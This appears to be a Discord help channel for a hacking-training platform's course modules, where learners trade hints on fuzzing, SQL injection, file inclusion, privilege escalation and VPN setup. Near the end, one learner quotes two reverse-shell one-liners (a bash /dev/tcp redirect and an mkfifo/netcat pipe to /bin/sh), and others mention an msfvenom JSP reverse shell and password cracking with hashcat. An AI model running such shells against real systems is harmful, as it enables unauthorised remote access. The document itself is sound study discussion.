haha no worries!

quiet wadi
#

I second daylan, you guys are effing incredible

#

I learned more here in a month than 4 years of college

rustic sage
#

its still confusing!

neon shard
#

Why am i not allowed to write in general?

novel matrix
red obsidianBOT
#

To talk in other channels you need to verify yourself first:

  1. Send ++verify in the #bot-commands channel
  2. Follow the instruction you will receive in PM (i.e send ++identify <Account Identifier> directly to the bot
    (The instructions are available in the #welcome channel)
vernal dagger
#

Could somebody help me with value fuzzing?

#

Try to create the 'ids.txt' wordlist, identify the accepted value with a fuzzing scan, and then use it in a 'POST' request with 'curl' to collect the flag. What is the content of the flag?

After narrowing down the key, I get a page that tells I dont have access to read the flag.

mortal spindle
#

anyone can help a newbie?

broken grail
#

what's the question?

#

I have my own problem btw

#

I know all 4 subnet ranges because I obviously got the first answer correct, but for some reason it's marking the bottom answer as wrong even though I wrote it in the same format

#

been trying many things for the past half an hour now

#

oh I'm so dumb, it asks for the broadcast address 🤦‍♂️

#

nvm, i thought it was asking for the network address

tough fjord
#

you don't need to post screen grabs showing you've done it 😉 we can take you at your word. Well done

broken grail
#

ok, noted

urban sky
#

Hey guys is there really no way to pause a session once you’ve spawned a vm instance? I’m on the free tier so only get one spawn a day but terminating the instance and resetting don’t do it. Should I just log off and I’ll still be able to retain the time I have left

tough fjord
#

I'm not sure. I've found it best to use my own VM

#

that way I'm not restricting in time

broken grail
#

yeah, I use Kali Linux VM for such stuff

urban sky
#

What if you’re not given the username and password to ssh into

#

I’m going through the nibbles walkthrough and I need way more time than alotted

broken grail
#

not sure where to ask this, but let's say I want to learn shell scripting, is it better to learn Windows PowerShell or Linux bash? if both, which one do I start with?

fringe salmon
#

Hi, could someone help me ? I'm stuck in FILE INCLUSION / DIRECTORY TRAVERSAL module, at the last question :/ I saw some hints on internet about php wrappers to retrieve index.php but i can't figure out

whole cargo
#

Hi,
Can I Unblock Teir III and TierIV If I Have Student Subscription?

knotty hemlock
#

Hi, I'm stuck exactly at the same question. Did anyone finish the OSINT module and can help me with the questions on GPS coordinates...?

proven jay
#

Hi, Im working on the linux part of the file transfers module, anyone here able to answer a question?

inner breach
#

Find a way to start a simple HTTP server using "npm". Submit the command that starts the web server on port 8080 (use the short argument to specify the port number).

Haven't been able to solve this since 10hours

loud sparrow
#

Hey, can someone give me a hint on SQLMAP Essentials Skills Assessment?

inner breach
#

I didn't find any useful info at the forum too

loud sparrow
rancid tide
#

hy guys, i need some help for module buffer overflow based on stack... there is a question where you have to insert the theoricaly size of NOPs+shellcode_size, and the question tell me to write it with Format 00...what is this format?

fallow delta
#

@sly nebula ran winpeas while I was doing the manual enumeration, still nothing...

patent blaze
#

In the module Windows Fundamentals - Skills Assessment do I need to start creating a shared folder ?

#

Or I can jump straigth to the question ?

haughty belfry
#

So for the linux fundamentals course, the question where kernel version is installed on the system I think it needs to be updated but because theres a new version that is installed and its taking the old version as the correct answer and not the new one

solar idol
#

bruh yesterday i lost my one and only Parrot OS spawn while doing the introduction module

#

now i need to get premium for more spawns?

proven jay
#

anyone else having connection issues for the box on intro to sqli

proven jay
bleak quarry
#

Hey all, sorry for the noob question but I just started the Linux fundamentals section in HTB Academy, under the User Management module there are the two questions Which option needs to be set to lock a user account using the "usermod" command? (long version of the option) and Which option needs to be set to execute a command as a different user using the "su" command? (long version of the option)…….Ive entered in —lock and every variation of usermod and it keeps kicking back as invalid answer. Likewise with the su question and —command. Any pointers? Been stuck on these for two days now. Thanks!

knotty hemlock
knotty hemlock
rancid tide
#

The modules about Linux buffer overflow

#

*module

#

And I have try to search in the forum, but there isn't the answer I need

knotty hemlock
#

If we're talking about the same question then you just need to insert an integer number + Bytes, like "100 Bytes" or something

knotty hemlock
rancid tide
#

😂

knotty hemlock
#

I feel you 😆

rancid tide
#

Anyway, thanks for the help

unique valve
# broken grail not sure where to ask this, but let's say I want to learn shell scripting, is it...

Hey good question. Its beneficial to learn both. Start with the one that you are more interested in and/or you see a more immediate benefit for. Overall both are great skills to have but it depends what your work entails on a day to day basis. If you work in an environment where you mainly work with Windows systems then Powershell will have a more immediate benefit to you. If you work mainly with Linux distributions then Bash will have a more immediate benefit. Does that make sense?

unique valve
inner breach
#

Qn from academy ) Submit the full path kf the "xxd" binary.

#

Hey this qn is really weird. I mean they haven't taught about the extension but still askin

#

☹️

broken grail
dreamy pecan
#

What does -c 'ii' mean and what was the function of it?

unique valve
dusk saffron
solar idol
#

per day hmmmmmmmmmmmm

unique valve
#

Yes but you can also buy a small number of cubes and have unlimited spawns. Its good to experiment with Pwnbox and your own personal VM from time to time to see what you prefer. Pwnbox works quite well for me most of the time.

tough fjord
#

you can always use your own VM

#

pwnbox is good for getting started and used to things, but in the long run you'll want your own VM you can configure your own way and have tools you like installed and ready to go

solar idol
#

so i just download a VM and install Parrot OS on it

#

right?

unique valve
#

If your base OS is Windows you can use Virtualbox or VMware Workstation player to build & run the VM.

lost dune
#

Hashcat > Working with Rules
What I missed...

||└──╼ $cat rule.txt
$2 $0 $2 $0
┌─[user59968@htb-asn2efvwzz]─[~]
└──╼ $cat hash
46244749d1e8fb99c37ad4f14fccb601ed4ae283
┌─[user59968@htb-asn2efvwzz]─[~]
└──╼ $hashcat -a 0 -m 100 hash /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -r rule.txt||

rustic sage
#

if you didnt find that in 10 hours 😳

inner breach
#

Actually I got the answer
The answer was pretty simple 😂😂

#

That's it😂😂

rustic sage
#

yeah that's litterally in the npm docs

urban sky
#

I asked this yesterday but didn’t get an answer. This is piggybacking off at @solar idol question. I have a kali Linux vm but I’m not able to remote into the target machine without a username/password. Would having a parrot os make a difference in removing in? I understand the free tier is one spawn per day but there’s no option to pause the session if I need to step away. I guess I’m still stuck on how people are using their own vms if the credentials to ssh aren’t provided

solar idol
#

if that answers your question

urban sky
#

That’s not what I meant. I meant How can I use my kali vm to remote into the target machine without ssh creds

solar idol
#

oh... im sorry but i aint capable enough to answer that. Im a complete NOOB.

urban sky
#

Lmao no worries bro

marsh laurel
#

i get this message when i use gobuster, can some please help what I need to do?

blissful cliff
# urban sky I asked this yesterday but didn’t get an answer. This is piggybacking off at <@6...

Apologies as this is just how I am reading it and a little confused on what you're actually asking 😅😅 ... most modules in which you have to connect to a machine within htb to complete will provide you with a vpn key file for you to use to connect using open vpn

If you're saying that it is asking you to connect to a machine yet have no credentials, potentially look through the modules of which you may have connected to another machine via ssh and use those creds to see if they work

crude kettle
blissful cliff
tight glen
#

haha... i was stuck forever on the nmap module and just realised my vpn crashed a while ago Happy

#

problem solved!

fallow delta
#

@sly nebula you free for a nudge on WinPrivEsc Assessment 1?

scarlet sapphire
#

hi i have a problem in sql injection module at skill assessment with kali

#

can dm someone so i dont spoil the answer

languid steppe
#

Right now I am doing the web requests module but whenever I use burps integrated browser it is infinitely loading

unique valve
#

What happens when you click forward in Burp?

languid steppe
unique valve
#

Feel free to DM me.

eager kite
#

Hello everyone! As I see, academy has CPE for now. But how I can get from "Fundamental" modules if I already did this modules? And how I can use this CPE?

tough fjord
eager kite
eager kite
#

No problem 🙂

#

Who can give me some tips? I'm in sqlmap skills assessment section. I found two endpoints which can be potential for injections but I don't understand with which parameters I can do it. I was trying to found calls of this endpoints in someplace of target but unsuccessfully..(

#

One of this endpoints return me SQL error and another return me permission denied for <someuser>

frigid summitBOT
#
qhadr#1356 has been warned

Reason: Mass mention

tough fjord
#

that was harsh - i'll fix it @urban sky

#

bot got a bit angry because you pinged too many people and aren't verified

urban sky
#

Haha no worries. In case anyone brings this up again, I wasn’t using sudo for the vpn key I downloaded. Thanks again guys

prisma hornet
#

Hey where is the Academy VPN file located?
Can I use the one provided in "Getting Started - Service Scanning" for all of the Academy?

eager kite
blissful cliff
prisma hornet
#

I dont want to use the pwnbox, so I got use a VPN from my Kali VM

blissful cliff
prisma hornet
#

I am a student sub so that doesnt matter. Also I do not want to use pwnbox, as they prohibit me from skipping/rereading a certain section of a module without the need of resizing

blissful cliff
prisma hornet
#

No worries.
The main issue is that the information and links on the section "Connecting Using VPN" are just outdated ...

rustic sage
#

yo does anyone know what to do once connected to a pwbox on starting points?

prisma hornet
#

I can VPN to HTB, starting point and other.
I just cant get the academy to work

blissful cliff
#

I think it potentially works slightly different due to them being separate is what i was trying to say there, wasn't very clear 😅

prisma hornet
#

Yeah. I got that.
I am on the "Getting Started module" and got the from Section: Service Scanning

rustic sage
#

bruh

#

why did they do that to my name lmfao

rustic sage
#

@languid fjord can u help me rq?

elder adder
#

Can you access any tier 3 or 4 modules with a student subscription?

timid mirage
#

In web requests module in the post section, where do I get the flag?

#

Also tp get admin, we know the credentials already, so why do we need to do the sql injection thing

marsh laurel
#

is gobuster reliable? I ask this because I created a wordlist.txt file with 3 entries:

api
prod
api-prod

I ran a gobuster dns using the wordlist.txt file and it picks up nothing when it should show api-prod
but it dose not

any ideas anyone?

urban sky
#

I'm going through the Nibbles walkthrough and I'm missing how exactly they got the password. They run the config.xml file but they tried it because it was mentioned twice in the file? And the actual password wasn't capitalized. Just trying to find what exactly pointed to that being the password.

#

This module was a blast by the way. getting root is freaking exciting

solid island
#

It's an environmental variable. look there!

rustic sage
#

Just check your network interface. Mtu is not present inside any of "socket checker"

austere ice
lilac jungle
#

Can anyone help me with SQL injection fundamentals module in Union clause content, In the cube question they asked to connect to IP:Port but they didn't mentioned any password or any such thing. I tried with default username and password like 'root' and 'p@ssw0rd', but these are also not working.

grim wave
#

Is it a login page?

lilac jungle
#

Nope I tried to access IP:Port in browser but not accessible. I tried to connect using 'mysql' as well. But credentials are not provided as well.

proven jay
#

Hey all, im stuck on the final part of the login brute forcing module. I have been creating wordlists using the correct tools, but none of them are working. Anyone I can dm for a hint?

prisma hornet
#

I am somewhat stuck on one section.
I am doing "Getting Started - Public Exploits".
I discovered the service furthermore I did a http-enum scan, but now I am stuck finding an attackable Plugin, a hint is appreciated. 🙂

thin jolt
#

banging my head against the wall for skill assessment Intro to Assembly Task 1. I created the loop to traverse the stack and xor its value with the key. Then I compile and run in gdb dumping the register value right after the xor operation (but before moving to the next value—e.g., adding 8 bytes). I then copy the hex values in a text file, concatenate them, clean them. I run the resulting shellcode in pwntools but nothing happens. I tried to reverse the bytes order to account for endianess, but same results. Anyone who could help?

gentle herald
#

windows buffer overflow module - when i click restart in debugger
rdp closes
my internet is fine
any help pls

crude kettle
#

Guys its okay to google how an exploit work how to configure it or watch a video related to do that . .this kind of act is considered as cheating while doing htb academy ctfs? Please reply.

vernal dagger
#

<div class='center'><p>You don't have access to read the flag!</p></div>
<html>
<!DOCTYPE html>

<head>
<title>HTB Academy</title>
<style>
*,
html {
margin: 0;
padding: 0;
border: 0;
}

html {
  width: 100%;
  height: 100%;
}

body {
  width: 100%;
  height: 100%;
  position: relative;
  background-color: darkslategrey;
}

.center {
  width: 100%;
  height: 50%;
  margin: 0;
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  color: white;
  font-family: "Helvetica", Helvetica, sans-serif;
  text-align: center;
}

h1 {
  font-size: 144px;
}

p {
  font-size: 64px;
}

</style>
</head>

<body>
</body>

</html>

#

where flag

#

From Value Fuzzing section

#

after using ids.txt i found 1 id with a different response size between 1000ids. I assume it has to be 73, but i cant read the flag. Can somebody please help me

rustic sage
#

try curl -d "73=key" -X POST http://admin...... without Content type?

#

You are close 🙂

swift warren
#

Lol whoever made the fuzzing module had some speeeeedy wifi. They getting like 9700+ req per second and im getting between 30 and 150 🤣

rustic sage
swift warren
#

Nah just started it

rustic sage
#

ahh. i looking for someone who can explain me:
"Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains? (Write the extensions as '.ext', in alphabetical order separated by spaces ".ext1 .ext2 .ext3")"

What extension should i try to find??? i have added to /etc/hosts academy.htb

SO academy.FUZZ ?????

swift warren
#

I haven't gotten there yet

#

I did figure out though that you can just increase the threads on your fuzzing command and you will get a lot more req/sec

rustic sage
#

i working from virtual machine... is available option in ffuf to increase threads? what is the switch??

swift warren
#

-t [number]

#

I did -t 200

rustic sage
#

ahhhh i see it

distant tide
#

I'm trying to go through NTFS vs. Share Permissions in Windows Fundamentals module but I'm stuck a the very beginning, I can't connect to the target with smbclient -L IPaddressOfTarget -U htb-student, I ran this from PWNBOX after RDP, did I understand correctly?

unique valve
#

The Windows firewall may be blocking you

distant tide
#

Thanks, I'll re-read that part!

unique valve
#

Feel free to dm if you get stuck.

distant tide
# unique valve Feel free to dm if you get stuck.

I could go on, but I don't understand ||how can I understand to which "Windows Defender Firewall Profiles" htb-student belongs to. I eventually set "Allow" for all of them and succeeded in connecting, but I'm not satisfied since I didn't understand why that happened||

unique valve
#

So with the Defender firewall in Windows theres 3 different profiles: Private, Public and Domain. Each specific firewall profile applies based on which IP network the Windows computer is on. Its not necessarily related to the user account. Take for example Pwnbox, Pwnbox isnt on the same IP network so Windows defender doesnt initially trust SMB connections coming from Pwnbox. Its a good practice to experiment with the firewall in case an application isnt properly connecting. Completely disabling the firewall and leaving it disabled is a bad practice but can be a good troubleshooting step to see if thats whats blocking your connection. If you determine that the firewall is blocking your connection then you’ll have to consider which protocols and/or IP addresses the firewall is blocking. In this case there are some predefined firewall rules you can enable in the advanced firewall settings to allow SMB connections through without leaving the firewall completely disabled. Does that make sense?

#

Also keep in mind with any application or service that communicates over the network there will be certain protocols & ports in use. Its beneficial to learn which protocols an application uses to understand whats happening behind the scenes as you connect over networks. Even video games use ports. Anytime your studying an application or troubleshooting consider researching something like: “what protocols does ______ application use?” Or “How to allow ______ application network connections through a firewall.”. These things can help in Academy challenges and beyond. Also keep asking questions here in the Discord 🙂

warped shard
#

i cannot understand this part

#

it says to go to this website but it never loads

#

pinging is fine though

#

i removed the port and i went to a tayside dogs website

#

is this the correct one ?

stiff stream
#

@warped shard What kind of error are you getting from loading the site itself?

undone tusk
distant tide
deft terrace
#

I'm working on 'Linux Local Privilege Escalation - Skills Assessment' and only the fifth flag is left.
I became tomcat with reverse shell and I checked sudo -l and I saw one command with NO PASSWORD.
I searched the command on GTFOBins and ran but it wasn't working.
Any advice for me?

stiff stream
#

@deft terrace are you using dumb shell?

deft terrace
# stiff stream <@!689132250134347777> are you using dumb shell?

I didn't know what is dumb shell. I googled it and I think I'm using dumb shell.
I used this command 'msfvenom -p java/jsp_shell_reverse_tcp' to become tomcat.
Should I change my dumb shell to interactive shell? or there is a way to make interactive reverse shell??

undone tusk
deft terrace
undone tusk
deft terrace
undone tusk
#

ik u can make it more interactive with netcat if you press Control Z then use the command "stty raw -echo" then press f then g

deft terrace
#

Many thanks guys for helping me

rustic sage
#

The Skills Assessment - File Inclusion/Directory Traversal has me at a standstill

magic scaffold
#

Hello
I'm new, sorry if the question is dumb.
I try to connect with SSH to a HTB academy server like so: ssh htb-student@xx.xxx.xx.xx but after 2 minutes I get this error:
ssh: connect to host xx.xxx.xx.xx port 22: Connection timed out
Am I doing something wrong?

rustic sage
#

Make sure your vpn is up

#

try to ping the ip address

stiff stream
#

Are you using pwnbox or kali/parrot?

magic scaffold
magic scaffold
magic scaffold
rustic sage
#

Sorry my mistake, some of academy modules don't use a vpn

stiff stream
#

I had problem with that

#

please, contact customer support, that's the only way they were able to fix it for me

dreamy pecan
#

What does -tunleep4 do and the meaning of it??

vernal dagger
stiff stream
#

yes

rustic sage
#

hi

onyx bane
#

Hlo

dark lake
#

hello can someone support me with the skill assasment module of the "attacking web applications with ffuf module"

rustic sage
#

hola , que tal ;D

dark lake
#

turns out i dont need support anymore, finished the module

frosty kite
#

sup

#

change me fucking nickname mods pls help

novel matrix
#

++tryverify

red obsidianBOT
#

To talk in other channels you need to verify yourself first:

  1. Send ++verify in the #bot-commands channel
  2. Follow the instruction you will receive in PM (i.e send ++identify <Account Identifier> directly to the bot
    (The instructions are available in the #welcome channel)
frosty kite
dark lake
#

does someone completed the windows fundamentals module and can help me with the "skill assasment"

young vigil
#

can i get help on web request?

high zinc
young vigil
#

google is your best friend 😄

merry bridge
#

I have a question about the "sql injection fundamentals" module.
The question is about finding a name AND when someone was hired out of the table and I've run the following command

select * from employees where first_name like 'bar%';

but i'm not seeing how to add an additional opperator to the search and i've been trying all sorts of silly things like piping the command again but with the other search criteria and various other things. any help would be appreciated

#

got it.... use AND after bar and do another where command

#

I guess this is the thing that can be frustrating about HTBA, I was just asked to use the AND operator to answer a question in the previous section and then look what the first thing was on the next page....

uncut kestrel
#

anyone doing HTB academy STACK-BASED BUFFER OVERFLOWS ON WINDOWS X86 ?
Final assessment : I am stuck with sooo many bad chars? Am I on right track I mean are there bad chars more that 10 or so ?

dreamy pecan
#

I need help in this question. I don't understand this question

prisma hornet
surreal rain
#

Maybe elaborate on what you don't understand

outer onyx
#

darf der kevin bei mir spielen kommen?

#

s

#

s

#

s

#

s

#

s

#

s

#

s

#

s

#

s

#

s

#

s

#

ups...

merry bridge
#

Nein

dark lake
#

hahaha

dark lake
stoic vessel
#

can anyone tell me how to connect to this mysql server.

sick crescent
#

Remote file inclusion

#

I , Can someone help me with this section of the FLI module

#

How can i set on the allow_url_include ?

dark lake
merry bridge
#

Use the IP address from the taget

stoic vessel
stoic vessel
merry bridge
#

That👆

#

Or try with sudo i think that worked for me last night

stoic vessel
#

ok

merry bridge
sick crescent
#

So it is the same strategy for the allow_url_fopen ?

merry bridge
#

Not sure, this is only my second module

#

It's the one I'm on as well

#

@stoic vessel you get in?

stoic vessel
#

found my mistake

#

i was adding space after -P !!no space<port>

#

got in

#

👍 @merry bridge

merry bridge
#

Yay

sick crescent
#

Thx alot guys, I will try this. 👍

lament drum
#

anyone can help with command injections module ?

novel matrix
#

What part are you stuck on? Anything before dnsadmin, i can help you with

#

anything after I can't

unkempt marten
#

I'd like help with File Inclusion, skill assessment

hollow flame
#

doing the web requests module i made a request to the server but i cant find apache server version what am i missing?

#

i got it after || curl -I -X server|| but why cant i see it in burp Thonk

faint basin
#

@hollow flame try move your request to Repeater, send it and then check out what is in response output

mighty sluice
floral blade
mighty sluice
potent lintel
#

hi

#

want my version of memz virus

young sleet
placid trout
#

hey guys I just thought this would be cool to learn. what should i get started on

merry bridge
#

I started with Linux fundamentals

knotty hemlock
#

Hi, I have problems to RDP with the netadm user in the "Windows Privilege Escalation" Course in section Dns-admin. It always says "Username or Password not correct". I had the same issue also in the "Windows built-in groups" section. It's really strange, the password is same for all tasks, only the username is different, how can I be wrong here?! This is what I typed: rdesktop -u netadm -p "HTB_@cademy_stdnt!" 10.129.43.42

#

if you see any obvious mistake, please let me know...

#

reset also didn't help

stiff stream
#

@knotty hemlock can you ping the server?

knotty hemlock
#

yes, i even get the login-screen, it's just that the password seems wrong

#

username not found

#

or is there a problem with the domain maybe? 🤨 the password is the same for most of the tasks in the windows priv esc course...

drifting knoll
#

@knotty hemlock just checked it, everything works fine
did you try to reset your target?

knotty hemlock
#

now i'm really confused! 🙂 yes, i tried again now with a fresh target, this one:

#

and this is my login screen which doesn't work (username or password incorrect) :

#

I also tried to remove the WINLPE-DC01 but it didn't work

#

this is how i called it (also tried xfreerdp, but it also didn't work): rdesktop -u "svc_backup" -p "HTB_@cademy_stdnt!" 10.129.43.42

#

...the underscores were stolen by the auto formatting, but in reality the're there..

potent mirage
#

Module 'Getting Started' Section 'Privilege Escalation' (or just in general)

#

How do I run a script (like LinPEAS) on a machine over a reverse shell?

#

^

#

Please help!

#

I'm also now having trouble setting up a reverse shell. I'm using Linux and the following two commands that I got from the academy do not work:

#

bash -c ‘bash -i >& /dev/TCP/00.000.00.000/<port> 0>&1’

#

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 00.000.00.000 <port> >/tmp/f

#

I am using the OpenVpn academy key and the correct ip and port generated.

low echo
#

Has anyone done the last assessment on the LFI module?

valid hamlet
#

hi guys

loud sparrow
#

Have someone a hint for Command Injections - Skills Assessment?

earnest wave
#

hi

icy snow
#

Did you figure this out?

pine dune
#

Hi guys nice to meet all of you, i am new here and cant type in general so ill just ask my question here. Can someone give me a brute force machine that is active and free to use on htb, i want something similar to nineveh (its retired now). Thank you!

#

ps: i fixed the reason i couldnt speak in general just saw my DMs

rain marlin
#

"What is the index number of the "sudoers" file in the "/etc" directory?" I've gone to the "/etc" directory and put the command "ls -i" for the index number for the sudoers file but it keeps saying the five-digit number is wrong I've restarted the VM and VPN number to no avail help would be great.#LINUX FUNDAMENTALS#Navigation

dreamy pecan
#

What do -f1 and -f2 mean and what's the function of it?

cloud pier
#

I need some help

cloud pier
#

In linux fundamentals quiz

stark relic
#

hello

#

anyone know some kind of hacking

green grove
#

Hello,
I am doing the getting started module and on the knowledge check part.
I have gained access via /admin panel and have the correct details to login, however the websites takes minutes to load a page at a time?
Any advice would be great?

burnt stone
hollow flame
#

can someone tell me what format the answer will be in?

#

web requests POST methods

#

i tried logging in with admin:password as the tutorial above said

#

it logs in

#

is that it?

#

i think theres more to it

#

but what is it?

#

nvm cookie manipulation was teh thing i had to do

knotty oasis
#

Hi, I'm new to HTB. I'm trying to complete the skills assessment for the windows fundamental module and am stuck on one of the questions. It asks to "List the SID associated with the user account Jim" but when I list all the users there is no Jim user. Have I completely misunderstood the question? I used the command wmic useraccount get name,sid and Jim does not appear in the list

unique valve
knotty oasis
#

Thanks Itnbob. How stupid of me.

unique valve
#

It happens, no worries. Keep pushing forward and feel free to reach out for guidance anytime 🙂

knotty oasis
#

thank you

drifting knoll
#

pls be careful with spoilers

hollow scaffold
#

do i use spoiler?

drifting knoll
#

your screenshot had some answers in it

hollow scaffold
#

why is this wrong?

hollow scaffold
drifting knoll
#

now its fine
which module and section?

hollow scaffold
#

linux fondamentals / system information

drifting knoll
#

did you SSH into your target?

hollow scaffold
#

no im using the given instance

#

from the browser

drifting knoll
hollow scaffold
#

owwww

#

i thought that was what they were talking about (the machine that spawned already)

#

thnx cry0l1t3

drifting knoll
#

you're welcome

raw cedar
#

hey folks!
is discord nitro is required for creating a bot👉 👈 🙄

tough fjord
#

nope

knotty hemlock
lilac jungle
#

Can anyone please help me in SQL injection Fundamentals skill assessment, I am not able to bypass the Login form, I found one db.sql file and got credentials as well but they are not working.

icy snow
#

Did you figure this out? I’m stuck here too

rustic sage
#

someone speak spanish

icy snow
#

Anyone able to help with the last question of the Active Directory LDAP skill assessment ‘What non-default privilege does the HTB-student user have?’

plush briar
#

@rustic sage me

rustic sage
#

@plush briar 2 cosas xd 1| sabes jugar lo de hack the box o eso y 2 me podrias enseñar si si sabes porfavor

blissful verge
#

hey all, new module!

wary torrent
#

Hey anyone gone through the OSINT: Corporate Recon Module? I believe I’ve run into an issue where an exercise question is not set up correctly. The question asks for the hosting provider of inlanefreight. The correct answer is D——————O———— but I’ve tried entering that 20 different ways (space, no spaces, llc, inc., etc.) and nothing’s taking. Any chance the answer is incorrectly set on the backend?

unborn ridge
#

Has anyone completed the "Windows Privilege Escalation" module and willing to give me a nudge with the following question? I completed the entire module minus this single question.

blissful verge
#

@unborn ridge im familiar with the module 😉 feel free to ping me

distant tide
#

Hello, I have a question about the Windows Fundamental module

#

I'm at the Skills Assessment section and it says "It is important that each step is completed in the order they are presented.". Does this mean that I can't interrupt and do a part of the points above because if I do so I'd have to restart from scratch the next time?

near mist
#

wich section?

potent lintel
#

tell me how to hack

autumn crow
#

Hey is there anyone that has done the Intro to Network Traffic Analysis in the Networking Primer - Layers 1-4 and that can give me some hints, i think the answer is easy, but i can't get it correctly. All other questions is answered correctly and only this one is my problem.

brave hollow
#

Hey, is anyone able to give a hint on the manual foothold method for ending getting started box? I used metasploit fine, but want to try manual. I found some interesting things but they aren't working

agile night
#

Hello, I need a hint for the medium IDS/IPS evasion lab - can't figure out how to query the DNS version.

desert pivot
#

Hi guys!
I`m struggling with last step of Windows fundamentals
"Creating a user called Jim

Uncheck: User must change password at logon"

I tried to do it is ISE but I get error message saying that access is denied. Should I do it from Control Panel ;p ?
If its wrong chat then I`m really sorry ;p

plush briar
#

@rustic sage No tengo idea de esto lo siento

unique valve
unique valve
distant tide
#

I see

wary torrent
#

I.e “SOMETHING-address” or maybe ‘addressing’

exotic swift
#

I'm not a programmer so I shouldn't be here

#

Ciao

crimson socket
#

i'm stuck in this question in the intro to network traffic analysis module. TcpDump fundamentals "If I wish to start a capture without hostname resolution, verbose output, showing contents in ASCII and hex, and grab the first 100 packets; what are the switches used? please answer in the order the switches are asked for in the question."Can someone give a solid HINT. thanks in advance.

wet willow
#

ATTACKING WEB APPLICATIONS WITH FFUF
Page 9
Filtering Results

#

i couldn't figure out how to do this question

#

my ffuf stucks like that and keeps spamming text until it finishes the word list

#

is there any other tool i can use for this instead of ffuf?

unique bear
wet willow
unique bear
#

gobuster vhost --help

autumn crow
wet willow
autumn crow
icy snow
#

Anyone up to help me with the LDAP skill assessment?

drifting knoll
#

pls be careful with spoilers

dreamy pecan
#

So, I was doing this question and this got me thinking, why can't I just use the grep command to find all the unique path why must I use other command to get the answer since the path always start with the same word (I know this question kinda dumb but I really dk why. Please explain to me)

novel matrix
jagged zenith
#

What do you mean by me? $18/month
I mean the month, does it expire in a month, and is renewed every month

#

@drifting knoll
What do you mean by me? $18/month
I mean the month, does it expire in a month, and is renewed every month

rustic sage
#

Hi Guys Im new here and i dont know anything about that server can someone help me please?

#

^LOL^

olive bobcat
#

Anybody there can please help me with first question in Broken Authentication? The one about default credentials

merry bridge
#

content creators, I'm glad to have this content but its really aggravating when the questions require knowledge not covered in the materials. example number 2 of your 'SQL injection fundamentals course'

I just spent 20 min trying to understand why
SELECT * FROM titles WHERE emp_no > 200000 or title != '%engineer%';
was incorrect because 'NOT LIKE' was not mentioned as an option.

lament rampart
hollow flame
#

can someone help me first time coming across an RDP related question in File Transfers

#

im on arch linux what rdp thing should i use?

hollow flame
#

ok so i got the rdp to work

#

using remmina and freerdp

#

so now

#

according to the question it said to upload the zip file before rdp'ing

#

how is that possible?

#

i cant ssh to wget from my computer

#

or anything like that?

#

i started an http.server on my machine and then went to the rdp connection to download the file

#

was the the only way

#

or there were more reversethonk

dreamy pecan
still blade
#

How am I supposed to finish the "Getting Started" module? The final knowledge check is sooooo slow

rustic sage
#

Hey i need help with file inclusion and directory treversal i tried every method taught in module and also tried every payload from hacktricks but can't able to get shell and read flag

cyan cargo
#

What protocol discussed in this section is used to share resources on the network using Windows? question in NTFS vs File Sharing cant find the correct answer because of case sensitivity? module Windows Fundamentals

autumn pilot
#

++mute @cyan cargo 20m Spamming channels with unrelated to their description question

red obsidianBOT
#

User @cyan cargo has been muted for 20m